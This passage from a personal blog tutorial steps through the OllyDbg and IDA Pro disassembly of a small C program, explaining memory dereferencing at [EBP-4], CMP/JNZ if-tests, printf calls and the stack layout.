For example, having steped through the code to the CMP statement, we would have seen that the ADD ESP,8 command immediately added 8 to the value stored in the ESP register. The CMP command however is not referring to the data stored in EBP, nor is it refering to (the value of the data stored in EBP)-4, but it is referencing the data stored at the memory address in the stack that equals the value of (EBP minus 4).  confusing?

If the data stored in EBP is “0012FF70″, then any refference to EBP without square brackets refers to the value 0012FF70.
if the data stored in the memory address 0012FF70 is “0012FFC0″, then a reference to [EBP] with the square brackets is referring to the value “0012FFC0″.
A reference to [EBP-4] first takes the number 4 away from the value stored in EBP, and then finds the value stored at the resultant memory address.  in this case EBP contains the hex value “0012FF70″ and so EBP-4 = “0012FF6C”.  if the data stored at the 0012FF6C stack address is “2″, then a reference to [EBP-4] = “2″.

I hope this is clear because it is a very important concept, and one that may not be clear to people who have only programmed in higher level languages (like myself I’m ashamed to admit).  Once again, I recommend that you step through this in Ollydbg paying close attention to the registers and the stack.

Moving right allong then, the rest of the code is as follows:

00401317   . 75 0F          JNZ SHORT hello2.00401328
00401319   . 68 CAB04000    PUSH hello2.0040B0CA                     ; /format = "number = 2"
0040131E   . E8 36760000    CALL hello2._printf                      ; \_printf
00401323   . 83C4 04        ADD ESP,4
00401326   . EB 0D          JMP SHORT hello2.00401335
00401328   > 68 BDB04000    PUSH hello2.0040B0BD                     ; /format = "number <> 2"
0040132D   . E8 27760000    CALL hello2._printf                      ; \_printf
00401332   . 83C4 04        ADD ESP,4

Here you see the basics of an if-test at work.  As we know, the previous command (CMP DWORD PTR SS:[EBP-4],2) effectively performed the operation [EBP-4]-2, and instead of storing the result, it sets the ZF and CF flags according to the outcome.  All we care about for this one is if the difference is zero (ZF flag set to 1).  If it is, the program will carry on with the next command, if it is not zero it will Jump (JNZ = Jump if not zero) by setting the next execution address (stored in the EIP register) to 00401328 and then continue on.

If we enter 2 into the program, the comparison will be zero and the program will proceed to tell us that the “number = 2″.  after it has finished doing this, it will proceed to the next command after the end of the alternate branch (the LEA command), if it takes the “number <> 2″ path, then once it has finished, it just continues with the next command.

If you are following closely at this point, you will notice that there are some unnecessary redundancies in this code.  there is a duplicated “ADD ESP, 4″, only one is ever executed due to the if-test so why not remove one and place the other at the end of the if-test?  you’ll also notice at this point that the EDI register already contains the value stored in [EBP-4] and so this second LEA command is unnecessary.  There are certain strange people in this world who actually care about this sort of thing and they actually have competitions in order to try to reduce the size of executables as much as possible by removing redundancies like this and being as efficient as possible….  for the moment, it’s just an interesting point to note:  compilers are not absolutely perfect.

Next, we get to our final section of the code.

00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |
0040133B   . 57             PUSH EDI                                 ; |<%d>
0040133C   . 68 A0B04000    PUSH hello2.0040B0A0                     ; |format = "The address of number is: %d and the value is %d"
00401341   . E8 17760000    CALL hello2._printf                      ; \_printf
00401346   . 83C4 0C        ADD ESP,0C
00401349   . B8 00000000    MOV EAX,0
0040134E   . 5F             POP EDI
0040134F   . C9             LEAVE
00401350   . C3             RETN

I just added this section of the code to ram home the difference between data stored in registers and the value stored in the memory location stored by the registers.

The first line here is fairly simple – it gets the value that we entered and puts it at the top of the stack, preparing it for being displayed to the user.  The second line gets the value of the memory address stored at EBP-4 and puts it into the EDI register.  the following line pushes it onto the stack and we’re ready to go.

If you take it one step further, the stack looks like this:

0012FF5C   0040B0A0  |format = "The address of number is: %d and the value is %d"
0012FF60   0012FF6C  |<%d> = 12FF6C (1245036.)
0012FF64   00000002  \<%d> = 2

You’ll notice that the numeral 2 was placed on the stack first followed by the memory address dispite the fact that the address is displayed first in the output string.  You can step into the CALL hello2._printf command (by hitting f7 in olly) to see what happens with these values.

You’ll notice that the program, when it completes it’s execution, will output “The address of number is: 125036″  if you convert this to hex, you’ll get 12FF6C, which is the memory address where our entered number is stored.

So there’s only one more thing remaining here.  We’ve seen what Olly does with the code, let’s have a quick peek at what IDA pro has to offer:

As you can see, IDA puts together a nice graphical program flow – it is very easy to see where in the code various jumps go to.  you’ll also notice that it appears to use a different method of dissassembly, or at least it displays the dissassembled code in a different manner than olly does.

these two lines in olly:
00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |

are somewhat simplified in IDA as:

push [ebp+var_4]
lea  edi, [ebp+var_4]

with var_4 being declared at the start as a constant.

I hope this has been helpful – Please feel free to leave a comment, if I’ve made any mistakes in the above, please let me know – I’m always trying to learn more :-)

Next time we’ll do the same thing again looking at array structures.

Cheers!
Nick.

Older Posts »

Categories